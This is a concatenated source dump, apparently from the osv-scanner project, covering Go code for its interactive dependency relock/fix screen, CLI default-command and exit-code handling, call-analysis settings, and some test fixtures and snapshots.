		return emptyInfoView, false // invalid (panic?)
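}
}

// buildPatchInfoViews rebuilds the per-patch info panels and the list of
// unfixable vulnerabilities from st.patches, then re-applies the info view size.
func (st *stateRelockResult) buildPatchInfoViews(m model) {
	// create the info view for each of the patches
	// and the unfixable vulns
	st.patchInfo = nil
	for _, p := range st.patches {
		st.patchInfo = append(st.patchInfo, tui.NewRelockInfo(p))
	}

	unfixableVulns := relockUnfixableVulns(st.patches)
	st.unfixableList = tui.NewVulnList(unfixableVulns, "")
	st.numUnfixable = len(unfixableVulns)
	st.ResizeInfo(m.infoViewWidth, m.infoViewHeight)
}

// relockUnfixableVulns returns pointers to the vulnerabilities of
// diffs[0].Original whose ID is not removed by any of the given diffs.
// It returns nil when diffs is empty.
//
// NOTE(review): only diffs[0].Original is consulted, so this presumably relies
// on every Difference sharing the same Original result - confirm.
func relockUnfixableVulns(diffs []resolution.Difference) []*resolution.Vulnerability {
	if len(diffs) == 0 {
		return nil
	}

	// find every vuln ID fixed in any patch
	fixableVulnIDs := make(map[string]struct{})
	for _, diff := range diffs {
		for _, v := range diff.RemovedVulns {
			fixableVulnIDs[v.OSV.GetId()] = struct{}{}
		}
	}

	// select only vulns that aren't fixed in any patch
	var unfixable []*resolution.Vulnerability
	for i, v := range diffs[0].Original.Vulns {
		if _, ok := fixableVulnIDs[v.OSV.GetId()]; !ok {
			// Take the address of the slice element, not of the loop copy.
			unfixable = append(unfixable, &diffs[0].Original.Vulns[i])
		}
	}

	return unfixable
}

// parseInput acts on the select key for the row under the cursor: focus an
// info view, toggle a patch, apply the pending patches, write, or quit.
func (st *stateRelockResult) parseInput(m model) (tea.Model, tea.Cmd) {
	var cmd tea.Cmd
	switch st.getEffectiveCursor() {
	case stateRelockRemain: // vuln line, focus info view
		st.focusedInfo = st.vulnList
	case stateRelockUnfixable: // unfixable vulns line, focus info view
		st.focusedInfo = st.unfixableList
	case stateRelockPatches: // patch selected
		idx := st.getPatchIndex()
		if _, ok := st.selectedPatches[idx]; ok { // if already selected, deselect it
			delete(st.selectedPatches, idx)
		} else if st.patchCompatible(idx) { // if it's compatible with current other selections, select it
			st.selectedPatches[idx] = struct{}{}
		}
	case stateRelockApply: // apply changes
		if len(st.selectedPatches) > 0 {
			m, cmd = st.relaxChoice(m)
		}
	case stateRelockWrite: // write
		m.writing = true
		cmd = func() tea.Msg { return st.write(m) }
	case stateRelockQuit: // quit
		cmd = tea.Quit
	}

	return m, cmd
}

// relaxChoice applies the currently selected patches. A single selection
// reuses the result already computed for that patch; several selections are
// merged into a cloned manifest that is re-resolved. Either way the returned
// command runs asynchronously and ends in a fresh patch computation.
func (st *stateRelockResult) relaxChoice(m model) (model, tea.Cmd) {
	// Block key input until the next relockPatchMsg. Update only gates keys on
	// patchesDone, and the multi-patch path below sets st.currRes to nil:
	// without this, a second select on the apply row would dereference a nil
	// st.currRes here, and a write could be started against a missing or
	// stale result.
	st.patchesDone = false

	if len(st.selectedPatches) == 1 {
		// If it's just a single patch, we've already computed the relock result
		for i := range st.selectedPatches { // selectedPatches is a map, iterate for the single key
			st.currRes = st.patches[i].New
			st.currErrs = st.currRes.Errors()
			st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs)
			// recreate vuln list view
			vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns))
			for i := range st.currRes.Vulns {
				vulns[i] = &st.currRes.Vulns[i]
			}
			st.vulnList = tui.NewVulnList(vulns, "")
			// Need to compute the possible patches from here
			return m, func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) }
		}
	}

	// Compute combined changes and re-resolve the graph
	manifest := st.currRes.Manifest.Clone()
	for i := range st.selectedPatches {
		for _, dp := range st.patches[i].Deps {
			for idx := range manifest.Requirements {
				rv := manifest.Requirements[idx]
				// Only rewrite a requirement that still has the version the patch was computed against.
				if rv.Name == dp.Pkg.Name && rv.Version == dp.OrigRequire {
					rv.Version = dp.NewRequire
					manifest.Requirements[idx] = rv
				}
			}
		}
	}

	// A nil currRes makes View show the "Resolving dependency graph" spinner.
	st.currRes = nil

	return m, func() tea.Msg {
		return doRelock(m.ctx, m.cl, manifest, m.options.ResolveOpts, m.options.MatchVuln)
	}
}

// View renders the relock screen. It renders nothing while a write is in
// progress and a spinner while a resolution or patch computation is running.
func (st *stateRelockResult) View(m model) string {
	if m.writing {
		return ""
	}
	s := strings.Builder{}
	s.WriteString("RELOCK\n")
	if st.currRes == nil {
		s.WriteString("Resolving dependency graph ")
		s.WriteString(st.spinner.View())
		s.WriteString("\n")

		return s.String()
	}

	s.WriteString(tui.RenderSelectorOption(
		st.getEffectiveCursor() == stateRelockRemain,
		"",
		"%s remain\n",
		fmt.Sprintf("%d vulnerabilities", len(st.currRes.Vulns)),
	))

	// TODO: Show current staged changes

	if !st.patchesDone {
		s.WriteString("\n")
		s.WriteString("Computing possible patches ")
		s.WriteString(st.spinner.View())
		s.WriteString("\n")

		return s.String()
	}

	s.WriteString(tui.RenderSelectorOption(
		st.getEffectiveCursor() == stateRelockUnfixable,
		"",
		"%s are unfixable\n",
		fmt.Sprintf("%d vulnerabilities", st.numUnfixable),
	))

	if len(st.currErrs) >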
0 {
		// Warning row. It tests the raw cursor; for rows above the patch list
		// getEffectiveCursor returns cursorPos unchanged, so the result is the same.
		s.WriteString(tui.RenderSelectorOption(
			st.cursorPos == stateRelockErrors,
			"",
			"WARNING: Encountered %s during graph resolution.\n",
			fmt.Sprintf("%d errors", len(st.currErrs)),
		))
	}
	s.WriteString("\n")

	if len(st.patches) == 0 {
		s.WriteString("No remaining vulnerabilities can be fixed.\n")
	} else {
		s.WriteString("Actions:\n")
		// One line per patch: a checkbox (greyed out when the patch conflicts
		// with the current selection) next to the wrapped description.
		patchStrs := make([]string, len(st.patches))
		for i, patch := range st.patches {
			var checkBox string
			if _, ok := st.selectedPatches[i]; ok {
				checkBox = "[x]"
			} else {
				checkBox = "[ ]"
			}
			if !st.patchCompatible(i) {
				checkBox = tui.DisabledTextStyle.Render(checkBox)
			}
			// Patch rows occupy the raw cursor slots stateRelockPatches+i.
			checkBox = tui.RenderSelectorOption(
				st.cursorPos == stateRelockPatches+i,
				" > ",
				"%s ",
				checkBox,
			)
			text := diffString(patch)
			var textSt lipgloss.Style
			if st.patchCompatible(i) {
				textSt = lipgloss.NewStyle()
			} else {
				textSt = tui.DisabledTextStyle
			}
			// Wrap the description into the width left over after the checkbox.
			text = textSt.Width(st.viewWidth - lipgloss.Width(checkBox)).Render(text)
			patchStrs[i] = lipgloss.JoinHorizontal(lipgloss.Top, checkBox, text)
		}
		s.WriteString(lipgloss.JoinVertical(lipgloss.Left, patchStrs...))
		s.WriteString("\n")

		if len(st.selectedPatches) > 0 {
			s.WriteString(tui.RenderSelectorOption(
				st.getEffectiveCursor() == stateRelockApply,
				"> ",
				"%s pending patches\n",
				"Apply",
			))
		} else {
			s.WriteString(tui.RenderSelectorOption(
				st.getEffectiveCursor() == stateRelockApply,
				"> ",
				tui.DisabledTextStyle.Render("No pending patches")+"\n",
			))
		}
	}

	s.WriteString(tui.RenderSelectorOption(
		st.getEffectiveCursor() == stateRelockWrite,
		"> ",
		"%s changes to manifest\n",
		"Write",
	))
	s.WriteString("\n")
	s.WriteString(tui.RenderSelectorOption(
		st.getEffectiveCursor() == stateRelockQuit,
		"> ",
		"%s without saving changes\n",
		"quit",
	))

	return s.String()
}

// diffString builds the one-line description of a patch: the single upgraded
// package with its old and new requirement, or the number of packages when
// the patch touches several, followed by the counts of resolved and newly
// introduced vulnerabilities.
func diffString(diff resolution.Difference) string {
	var depStr string
	if len(diff.Deps) == 1 {
		dep := diff.Deps[0]
		depStr = fmt.Sprintf("%s@%s → @%s", dep.Pkg.Name, dep.OrigRequire, dep.NewRequire)
	} else {
		depStr = fmt.Sprintf("%d packages", len(diff.Deps))
	}
	str := fmt.Sprintf("Upgrading %s resolves %d vulns", depStr, len(diff.RemovedVulns))
	// An upgrade can pull in new vulnerabilities; show that next to the gain.
	if len(diff.AddedVulns) > 0 {
		str += fmt.Sprintf(" but introduces %d new vulns", len(diff.AddedVulns))
	}

	return str
}

// InfoView renders the info panel that belongs to the row under the cursor.
func (st *stateRelockResult) InfoView() string {
	v, _ := st.currentInfoView()
	return v.View()
}

// check if a patch is compatible with the currently selected patches
// i.e. if none of the direct dependencies in the current patch appear in the already selected patches
func (st *stateRelockResult) patchCompatible(idx int) bool {
	if _, ok := st.selectedPatches[idx]; ok {
		// already selected, it must be compatible
		return true
	}
	// find any shared direct dependency packages
	patch := st.patches[idx]
	for i := range st.selectedPatches {
		curr := st.patches[i]
		for _, dep := range curr.Deps {
			for _, newDep := range patch.Deps {
				if dep.Pkg == newDep.Pkg {
					return false
				}
			}
		}
	}

	return true
}

// Resize records the new main view width; the height is not used.
func (st *stateRelockResult) Resize(w, _ int) { st.viewWidth = w }

// ResizeInfo propagates the info view size to the vulnerability list and to
// every patch info panel.
//
// NOTE(review): unfixableList and resolveErrors are not resized here - confirm
// whether those views size themselves or should be included.
func (st *stateRelockResult) ResizeInfo(w, h int) {
	st.vulnList.Resize(w, h)
	for _, info := range st.patchInfo {
		info.Resize(w, h)
	}
}

// IsInfoFocused reports whether an info view currently has focus.
func (st *stateRelockResult) IsInfoFocused() bool {
	return st.focusedInfo != nil
}

// TODO: Work out a better way to output npm commands
//
// write persists the staged relock result: it overwrites the manifest with the
// difference between m.relockBaseRes and st.currRes and, when a lockfile is
// configured, runs the command built by regenerateLockfileCmd through
// tea.ExecProcess. If that run fails, the command is rebuilt and run once more
// with "--legacy-peer-deps" appended. The outcome is reported as a writeMsg.
//
// NOTE(review): the manifest is overwritten before the external command runs
// and nothing visible here restores it, so a failed regeneration leaves a
// changed manifest next to the old lockfile.
// NOTE(review): the retry is taken on any error from the first run, not only
// on peer-dependency conflicts.
// NOTE(review): regenerateLockfileCmd is not shown here; presumably it invokes
// the project's package manager, and such a run can execute install scripts of
// the newly resolved dependencies - confirm whether script execution is
// disabled. context.TODO() also means the child process gets no cancellation
// or deadline from the caller.
func (st *stateRelockResult) write(m model) tea.Msg {
	changes := m.relockBaseRes.CalculateDiff(st.currRes)
	if err := manif.Overwrite(m.options.ManifestRW, m.options.Manifest, changes.Patch); err != nil {
		return writeMsg{err}
	}

	if m.options.Lockfile == "" {
		// TODO: there's no user feedback to show this was successful
		return writeMsg{nil}
	}

	// TODO: This will be moved to osv-scalibr, which might have context already
	c, err := regenerateLockfileCmd(context.TODO(), m.options)
	if err != nil {
		return writeMsg{err}
	}

	return tea.ExecProcess(c, func(err error) tea.Msg {
		if err != nil {
			// try again with "--legacy-peer-deps"
			c, err := regenerateLockfileCmd(context.TODO(), m.options)
			if err != nil {
				return writeMsg{err}
			}
			c.Args = append(c.Args, "--legacy-peer-deps")

			return tea.ExecProcess(c, func(err
error) tea.Msg { return writeMsg{err} })() } return writeMsg{err} })() } type relockPatchMsg struct { patches []resolution.Difference err error } // Find all groups of dependency bumps required to resolve each vulnerability individually func doComputeRelockPatches(ctx context.Context, cl client.ResolutionClient, currRes *resolution.Result, opts osvFixOptions) relockPatchMsg { patches, err := remediation.ComputeRelaxPatches(ctx, cl, currRes, opts.Options) if err != nil { return relockPatchMsg{err: err} } return relockPatchMsg{patches: patches} } ================================================ FILE: cmd/osv-scanner/fix/testdata/in-place-npm/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/fix/testdata/override-maven/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/fix/testdata/override-maven/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 4.0 org.jsoup jsoup 1.14.1 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0 ================================================ FILE: cmd/osv-scanner/fix/testdata/relax-npm/package.json ================================================ { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "6.2.0" } } ================================================ FILE: cmd/osv-scanner/fix/testmain_test.go ================================================ package fix_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" 
"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{fix.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/internal/cmd/__snapshots__/helpers_test.snap ================================================ [Test_insertDefaultCommand - 1] --- [Test_insertDefaultCommand - 2] --- [Test_insertDefaultCommand - 3] --- [Test_insertDefaultCommand - 4] --- [Test_insertDefaultCommand - 5] --- [Test_insertDefaultCommand - 6] Warning: `helpers.go` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `helpers.go` is assumed to be a subcommand here. If you intended for `helpers.go` to be an argument to `default`, you must specify `default helpers.go` in your command line. --- [Test_insertDefaultCommand - 7] --- [Test_insertDefaultCommand - 8] --- [Test_insertDefaultCommand - 9] --- [Test_insertDefaultCommand - 10] --- [Test_insertDefaultCommand - 11] --- [Test_insertDefaultCommand - 12] --- [Test_insertDefaultCommand - 13] --- [Test_insertDefaultCommand - 14] --- [Test_insertDefaultCommand - 15] --- [Test_insertDefaultCommand - 16] --- ================================================ FILE: cmd/osv-scanner/internal/cmd/helpers.go ================================================ // Package cmd provides helper functions for the osv-scanner CLI commands. 
package cmd import ( "fmt" "io" "os" "slices" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/urfave/cli/v3" ) func getCustomHelpTemplate() string { return ` NAME: {{.Name}} - {{.Usage}} USAGE: {{.Name}} {{if .VisibleFlags}}[global options]{{end}}{{if .Commands}} command [command options]{{end}} EXAMPLES: # Scan a source directory $ {{.Name}} scan source -r # Scan a source directory in offline mode $ {{.Name}} scan source --offline-vulnerabilities --download-offline-database -r # Scan a container image $ {{.Name}} scan image # Scan a local image archive (e.g. a tar file) and generate HTML output $ {{.Name}} scan image --serve --archive # Fix vulnerabilities in a manifest file and lockfile (non-interactive mode) $ {{.Name}} fix -M -L For full usage details, please refer to the help command of each subcommand (e.g. {{.Name}} scan --help). Alternatively, you can access the detailed documentation here: https://google.github.io/osv-scanner/ VERSION: {{.Version}} COMMANDS: {{range .Commands}}{{if and (not .HideHelp) (not .Hidden)}} {{join .Names ", "}}{{ "\t"}}{{.Usage}}{{ "\n" }}{{end}}{{end}} {{if .VisibleFlags}} GLOBAL OPTIONS: {{range .VisibleFlags}} {{.}}{{end}} {{end}} ` } // Gets all valid commands and global options for OSV-Scanner. 
// The returned list holds every subcommand name, each help flag name both bare
// (the help command) and with "-" / "--" prefixes, and each version flag name
// with "-" / "--" prefixes. insertDefaultCommand treats args[1] as a known
// command only when it appears in this list.
func getAllCommands(commands []*cli.Command) []string {
	// Adding all subcommands
	allCommands := make([]string, 0, len(commands))
	for _, command := range commands {
		allCommands = append(allCommands, command.Name)
	}

	// Adding help command and help flags
	for _, flag := range cli.HelpFlag.Names() {
		allCommands = append(allCommands, flag)      // help command
		allCommands = append(allCommands, "-"+flag)  // help flag
		allCommands = append(allCommands, "--"+flag) // help flag
	}

	// Adding version flags
	for _, flag := range cli.VersionFlag.Names() {
		allCommands = append(allCommands, "-"+flag)
		allCommands = append(allCommands, "--"+flag)
	}

	return allCommands
}

// warnIfCommandAmbiguous warns the user if the command they are trying to run
// exists as both a subcommand and as a file on the filesystem.
// If this is the case, the command is assumed to be a subcommand.
//
// The filesystem check is an os.Stat of the argument exactly as given, so a
// relative name is resolved against the current working directory. The warning
// is written to stderr; nothing is returned and the arguments are not changed.
func warnIfCommandAmbiguous(command, defaultCommand string, stderr io.Writer) {
	if _, err := os.Stat(command); err == nil {
		// todo this should be using slog.Warn, maybe...
		fmt.Fprintf(stderr, "Warning: `%[1]s` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. "+
			"`%[1]s` is assumed to be a subcommand here. If you intended for `%[1]s` to be an argument to `%[2]s`, "+
			"you must specify `%[2]s %[1]s` in your command line.\n", command, defaultCommand)
	}
}

// Inserts the default command to args if no command is specified.
//
// Three outcomes are possible:
//   - args[1] is not a known command or built-in flag: a new slice is returned
//     with defaultCommand and scan.DefaultSubcommand inserted before the
//     original arguments.
//   - args[1] is defaultCommand and args[2] is not one of scan.Subcommands: a
//     new slice is returned with scan.DefaultSubcommand inserted after it.
//   - otherwise args is returned unchanged (after the ambiguity warning check).
//
// NOTE(review): in both rewritten slices index 0 is never assigned, so the
// returned slice starts with "" rather than the original args[0].
func insertDefaultCommand(args []string, commands []*cli.Command, defaultCommand string, stderr io.Writer) []string {
	// Do nothing if no command or file name is provided.
	if len(args) < 2 {
		return args
	}

	allCommands := getAllCommands(commands)
	command := args[1]
	// If no command is provided, use the default command and subcommand.
	if !slices.Contains(allCommands, command) {
		// Avoids modifying args in-place, as some unit tests rely on its original value for multiple calls.
		argsTmp := make([]string, len(args)+2)
		copy(argsTmp[3:], args[1:])
		argsTmp[1] = defaultCommand
		// Set the default subCommand of Scan
		argsTmp[2] = scan.DefaultSubcommand

		// Executes the cli app with the new args.
		return argsTmp
	}

	warnIfCommandAmbiguous(command, defaultCommand, stderr)

	// If only the default command is provided without its subcommand, append the subcommand.
	if command == defaultCommand {
		if len(args) < 3 {
			// Indicates that only "osv-scanner scan" was provided, without a subcommand or filename
			return args
		}

		subcommand := args[2]
		// Default to the "source" subcommand if none is provided.
		if !slices.Contains(scan.Subcommands, subcommand) {
			argsTmp := make([]string, len(args)+1)
			copy(argsTmp[3:], args[2:])
			argsTmp[1] = defaultCommand
			argsTmp[2] = scan.DefaultSubcommand

			return argsTmp
		}

		// Print a warning message if subcommand exist on the filesystem.
		warnIfCommandAmbiguous(subcommand, scan.DefaultSubcommand, stderr)
	}

	return args
}

================================================
FILE: cmd/osv-scanner/internal/cmd/helpers_test.go
================================================
package cmd

import (
	"bytes"
	"log/slog"
	"reflect"
	"testing"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/urfave/cli/v3"
)

// Test_insertDefaultCommand checks the rewritten argument slice for each case
// and snapshots whatever was written to stdout and stderr.
func Test_insertDefaultCommand(t *testing.T) {
	t.Parallel()
	commands := []*cli.Command{
		{Name: "default"},
		// Shares its name with a file in this package directory (helpers.go),
		// which is what makes the ambiguity warning fire in the test below.
		{Name: "helpers.go"},
		{Name: "scan"},
	}
	defaultCommand := "default"

	tests := []struct {
		originalArgs []string
		wantArgs     []string
	}{
		// test when default command is specified
		{
			originalArgs: []string{"", "default", "file"},
			wantArgs:     []string{"", "default", "source", "file"},
		},
		// test when command is not specified
		{
			originalArgs: []string{"", "file"},
			wantArgs:     []string{"", "default", "source", "file"},
		},
		// test when command is also a filename
		{
			originalArgs: []string{"", "helpers.go"},
			wantArgs:     []string{"", "helpers.go"},
		},
		// test when subcommand is also a filename
		{
originalArgs: []string{"", "default", "image"},
			wantArgs:     []string{"", "default", "image"},
		},
		// test when command is not valid
		{
			originalArgs: []string{"", "invalid"},
			wantArgs:     []string{"", "default", "source", "invalid"},
		},
		// test when command is a built-in option
		{
			originalArgs: []string{"", "--version"},
			wantArgs:     []string{"", "--version"},
		},
		{
			originalArgs: []string{"", "-h"},
			wantArgs:     []string{"", "-h"},
		},
		{
			originalArgs: []string{"", "help"},
			wantArgs:     []string{"", "help"},
		},
	}

	for _, tt := range tests {
		stdout := &bytes.Buffer{}
		stderr := &bytes.Buffer{}
		logger := cmdlogger.New(stdout, stderr)
		slog.SetDefault(slog.New(logger))

		argsActual := insertDefaultCommand(tt.originalArgs, commands, defaultCommand, stderr)
		if !reflect.DeepEqual(argsActual, tt.wantArgs) {
			t.Errorf("Test Failed. Details:\n"+
				"Args (Got): %s\n"+
				"Args (Want): %s\n", argsActual, tt.wantArgs)
		}
		testutility.NewSnapshot().MatchText(t, stdout.String())
		testutility.NewSnapshot().MatchText(t, stderr.String())
	}
}

================================================
FILE: cmd/osv-scanner/internal/cmd/run.go
================================================
package cmd

import (
	"context"
	"errors"
	"io"
	"log/slog"
	"net/http"
	"testing"

	scalibr "github.com/google/osv-scalibr/version"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/testlogger"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/google/osv-scanner/v2/pkg/osvscanner"
	"github.com/urfave/cli/v3"
)

// Build metadata printed by the version printer in Run.
// NOTE(review): presumably overridden at build time; nothing in this file sets them.
var (
	commit = "n/a"
	date   = "n/a"
)

// CommandBuilder constructs one CLI command wired to the given output writers
// and HTTP client.
type CommandBuilder = func(stdout, stderr io.Writer, client *http.Client) *cli.Command

// Run builds the osv-scanner CLI from the given command builders, executes it
// with args, and returns the process exit code.
//
// Exit codes, in the order they are checked once the command has run:
//   - 130: the log handler recorded an invalid config; checked first, so it
//     takes priority over every other outcome, including vulnerabilities found
//   - 1: the error is osvscanner.ErrVulnerabilitiesFound
//   - 128: the error is osvscanner.ErrNoPackagesFound
//   - 129: the error is osvscanner.ErrAPIFailed
//   - 127: any remaining case in which the log handler recorded an error
//   - 0: none of the above
//
// Only 0 indicates a scan that completed without findings or logged errors;
// callers that gate on the result (for example a CI job) should not treat
// 127-130 as a clean scan.
//
// When running under `go test`, Run panics if the default slog handler is not
// a *testlogger.Handler.
func Run(args []string, stdout, stderr io.Writer, client *http.Client, commands []CommandBuilder) int {
	// --- Setup Logger ---
	logHandler := cmdlogger.New(stdout, stderr)

	// If in testing mode, set logger via Handler
	// Otherwise, set default global logger
	if testing.Testing() {
		handler, ok := slog.Default().Handler().(*testlogger.Handler)
		if !ok {
			panic("Test failed to initialize default logger with Handler")
		}

		handler.AddInstance(logHandler)
		defer handler.Delete()
	} else {
		slog.SetDefault(slog.New(logHandler))
	}
	// ---

	// Printing help also marks the run as errored.
	// NOTE(review): presumably this is what makes HasErrored() below report true
	// after help output; confirm in cmdlogger.
	cli.HelpPrinter = func(w io.Writer, templ string, data any) {
		cmdlogger.SetHasErrored()
		cli.HelpPrinterCustom(w, templ, data, nil)
	}

	cli.VersionPrinter = func(cmd *cli.Command) {
		cmdlogger.Infof("osv-scanner version: %s", cmd.Version)
		cmdlogger.Infof("osv-scalibr version: %s", scalibr.ScannerVersion)
		cmdlogger.Infof("commit: %s", commit)
		cmdlogger.Infof("built at: %s", date)
	}

	// Instantiate every command with the shared writers and HTTP client.
	cmds := make([]*cli.Command, 0, len(commands))
	for _, cmd := range commands {
		cmds = append(cmds, cmd(stdout, stderr, client))
	}

	app := &cli.Command{
		Name:                          "osv-scanner",
		Version:                       version.OSVVersion,
		Usage:                         "scans various mediums for dependencies and checks them against the OSV database",
		Suggest:                       true,
		Writer:                        stdout,
		ErrWriter:                     stderr,
		DefaultCommand:                "scan",
		Commands:                      cmds,
		CustomRootCommandHelpTemplate: getCustomHelpTemplate(),
	}

	// If ExitErrHandler is not set, cli will use the default cli.HandleExitCoder.
	// This is not ideal as cli.HandleExitCoder checks if the error implements cli.ExitCode interface.
	//
	// 99% of the time, this is fine, as we do not implement cli.ExitCode in our errors, so errors pass through
	// that handler untouched.
	// However, because of Go's duck typing, any error that happens to have a ExitCode() function
	// (e.g. *exec.ExitError) will be assumed to implement cli.ExitCode interface and cause the program to exit
	// early without proper error handling.
	//
	// This removes the handler entirely so that behavior will not unexpectedly happen.
	app.ExitErrHandler = func(_ context.Context, _ *cli.Command, _ error) {}

	// Rewrite the arguments so a bare path falls through to the default command.
	args = insertDefaultCommand(args, app.Commands, app.DefaultCommand, stderr)

	err := app.Run(context.Background(), args)

	// if the config is invalid, it's possible that is why any other errors
	// happened so that exit code takes priority
	if logHandler.HasErroredBecauseInvalidConfig() {
		return 130
	}

	if err != nil {
		switch {
		case errors.Is(err, osvscanner.ErrVulnerabilitiesFound):
			return 1
		case errors.Is(err, osvscanner.ErrNoPackagesFound):
			cmdlogger.Errorf("No package sources found, --help for usage information.")
			return 128
		case errors.Is(err, osvscanner.ErrAPIFailed):
			cmdlogger.Errorf("%v", err)
			return 129
		}
		// Any other error is logged here and falls through to the HasErrored check.
		cmdlogger.Errorf("%v", err)
	}

	// if we've been told to print an error, and not already exited with
	// a specific error code, then exit with a generic non-zero code
	if logHandler.HasErrored() {
		return 127
	}

	return 0
}

================================================
FILE: cmd/osv-scanner/internal/cmd/testmain_test.go
================================================
package cmd

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/testutility"
)

// TestMain runs the package tests and then cleans up snapshots.
func TestMain(m *testing.M) {
	m.Run()

	testutility.CleanSnapshots(m)
}

================================================
FILE: cmd/osv-scanner/internal/helper/callanalysis_parser.go
================================================
package helper

// stableCallAnalysisStates lists the languages call analysis knows about and
// whether each one is on when the user gives no explicit setting.
var stableCallAnalysisStates = map[string]bool{
	"go":   true,
	"rust": false,
	"jar":  false,
}

// CreateCallAnalysisStates creates a map to record if languages are enabled or disabled for call analysis
//
// Entries from enabledCallAnalysis are set to true, then entries from
// disabledCallAnalysis are set to false, so a language named in both ends up
// disabled. The special name "all" is then applied to the languages in
// stableCallAnalysisStates:
//   - a language without an explicit setting gets its default, or true when
//     "all" was enabled;
//   - when "all" was disabled, every listed language is forced to false, even
//     one that was explicitly enabled.
//
// The "all" key itself is removed from the result. Names that are not in
// stableCallAnalysisStates are kept as given.
//
// Enabling "all" also turns on the languages that are off by default. The
// --call-analysis usage text states that rust call analysis runs build
// scripts, so "all" has that effect too unless rust is explicitly disabled.
func CreateCallAnalysisStates(enabledCallAnalysis []string, disabledCallAnalysis []string) map[string]bool {
	callAnalysisStates := make(map[string]bool)

	for _, language := range enabledCallAnalysis {
		callAnalysisStates[language] = true
	}

	for _, language := range disabledCallAnalysis {
		callAnalysisStates[language] = false
	}

	// enableAll is the value given for "all"; containsAll is whether it was given at all.
	enableAll, containsAll := callAnalysisStates["all"]
	for language, isStable := range stableCallAnalysisStates {
		if _, exists := callAnalysisStates[language]; !exists {
			callAnalysisStates[language] = isStable || enableAll
		}
		if containsAll && !enableAll {
			callAnalysisStates[language] = false
		}
	}
	delete(callAnalysisStates, "all")

	return callAnalysisStates
}

================================================
FILE: cmd/osv-scanner/internal/helper/callanalysis_parser_test.go
================================================
package helper

import (
	"reflect"
	"testing"
)

// TestCreateCallAnalysisStates covers explicit enables, "all" in either list,
// and the combination of "all" with per-language overrides.
func TestCreateCallAnalysisStates(t *testing.T) {
	t.Parallel()

	testCases := []struct {
		enabledCallAnalysis        []string
		disabledCallAnalysis       []string
		expectedCallAnalysisStates map[string]bool
	}{
		{
			enabledCallAnalysis:  []string{"go", "rust"},
			disabledCallAnalysis: []string{},
			expectedCallAnalysisStates: map[string]bool{
				"go":   true,
				"rust": true,
				"jar":  false,
			},
		},
		{
			enabledCallAnalysis:  []string{"all"},
			disabledCallAnalysis: []string{"rust"},
			expectedCallAnalysisStates: map[string]bool{
				"go":   true,
				"rust": false,
				"jar":  true,
			},
		},
		{
			enabledCallAnalysis:  []string{},
			disabledCallAnalysis: []string{"all"},
			expectedCallAnalysisStates: map[string]bool{
				"go":   false,
				"rust": false,
				"jar":  false,
			},
		},
		{
			enabledCallAnalysis:  []string{},
			disabledCallAnalysis: []string{"rust"},
			expectedCallAnalysisStates: map[string]bool{
				"go":   true,
				"rust": false,
				"jar":  false,
			},
		},
		{
			enabledCallAnalysis:  []string{"all", "rust"},
			disabledCallAnalysis: []string{"go"},
			expectedCallAnalysisStates: map[string]bool{
				"go":   false,
				"rust": true,
				"jar":  true,
			},
		},
	}

	for _, testCase := range testCases {
		actualCallAnalysisStates := CreateCallAnalysisStates(testCase.enabledCallAnalysis, testCase.disabledCallAnalysis)

		if !reflect.DeepEqual(actualCallAnalysisStates, testCase.expectedCallAnalysisStates) {
			t.Errorf("expected call analysis states to be %v, but got %v", testCase.expectedCallAnalysisStates, actualCallAnalysisStates)
		}
	}
}

================================================
FILE: cmd/osv-scanner/internal/helper/flags.go
================================================
package helper

import (
	"context"
	"fmt"
	"slices"
	"strings"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/reporter"
	"github.com/urfave/cli/v3"
)

// offlineFlags is a map of flags which require network access to operate,
// with the values to set them to in order to disable them
var offlineFlags = map[string]string{
	"offline-vulnerabilities": "true",
	"no-resolve":              "true",
}

// a "boolean or list" flag whose presence indicates a summary of licenses should
// be printed, and whose (optional) value will be a comma-delimited list of licenses
// that should be considered allowed
type allowedLicencesFlag struct {
	allowlist []string
}

// Get returns the flag itself so callers can reach the parsed allowlist.
func (g *allowedLicencesFlag) Get() any {
	return g
}

// Set parses the flag value. An empty value, "true" or "false" clears the
// allowlist; anything else is split on commas. Entries are not trimmed or
// validated here, and Set never returns an error.
func (g *allowedLicencesFlag) Set(value string) error {
	if value == "" || value == "false" || value == "true" {
		g.allowlist = nil
	} else {
		g.allowlist = strings.Split(value, ",")
	}

	return nil
}

// IsBoolFlag indicates that it is valid to use this flag in a boolean context
// and is what lets us accept both enable/disable and list-of-licenses values
func (g *allowedLicencesFlag) IsBoolFlag() bool {
	return true
}

// String renders the allowlist back into its comma-separated form.
func (g *allowedLicencesFlag) String() string {
	return strings.Join(g.allowlist, ",")
}

// BuildCommonScanFlags returns a slice of flags which are common to all scan (sub)commands
//
